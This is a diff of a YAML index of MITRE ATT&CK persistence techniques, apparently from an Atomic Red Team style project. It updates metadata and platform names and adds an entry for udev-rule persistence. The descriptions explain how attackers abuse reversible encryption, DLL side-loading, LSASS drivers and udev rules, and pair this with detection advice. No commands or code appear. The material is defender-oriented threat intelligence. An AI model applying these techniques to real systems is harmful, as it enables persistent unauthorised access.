       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34650,18 +35048,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34694,10 +35091,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34734,7 +35130,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34808,7 +35203,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34836,12 +35231,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -34900,33 +35294,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34947,6 +35318,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -34961,52 +35333,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -35028,6 +35390,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -35038,23 +35401,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -35071,7 +35461,7 @@ persistence:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -35130,7 +35520,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -35212,7 +35601,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1543.002:
@@ -35327,12 +35715,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1136:
     technique:
-      modified: '2024-01-31T20:46:43.215Z'
+      modified: '2024-10-15T15:53:21.895Z'
       name: Create Account
       description: |-
         Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
@@ -35355,16 +35742,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Network
       - Containers
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -35391,7 +35777,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.013:
     technique:
@@ -35460,7 +35845,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.007:
     technique:
@@ -35496,7 +35880,7 @@ persistence:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -35515,12 +35899,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -35570,12 +35953,11 @@ persistence:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -35608,9 +35990,10 @@ persistence:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -35627,9 +36010,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -35675,12 +36057,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1653:
     technique:
-      modified: '2023-09-30T21:28:45.038Z'
+      modified: '2024-10-16T20:11:40.334Z'
       name: Power Settings
       description: |-
         Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
@@ -35694,7 +36075,7 @@ persistence:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Juan Tapiador
       x_mitre_deprecated: false
       x_mitre_detection: "Command-line invocation of tools capable of modifying services
@@ -35753,7 +36134,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.001:
     technique:
@@ -35779,7 +36159,7 @@ persistence:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -35805,13 +36185,11 @@ persistence:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1137.002:
     technique:
-      modified: '2024-04-16T12:41:55.175Z'
+      modified: '2024-10-15T16:01:48.325Z'
       name: 'Office Application Startup: Office Test'
       description: |-
         Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
@@ -35835,8 +36213,8 @@ persistence:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'Command: Command Execution'
@@ -35866,7 +36244,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1137.002
     atomic_tests: []
   T1547.008:
@@ -35909,7 +36286,7 @@ persistence:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -35934,12 +36311,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -35979,8 +36355,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -35988,13 +36366,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -36025,9 +36403,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -36149,10 +36524,10 @@ persistence:
           '
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -36215,7 +36590,7 @@ persistence:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -36249,8 +36624,8 @@ persistence:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -36259,6 +36634,10 @@ persistence:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -36271,12 +36650,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -36289,6 +36667,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -36325,17 +36704,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -36381,9 +36760,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
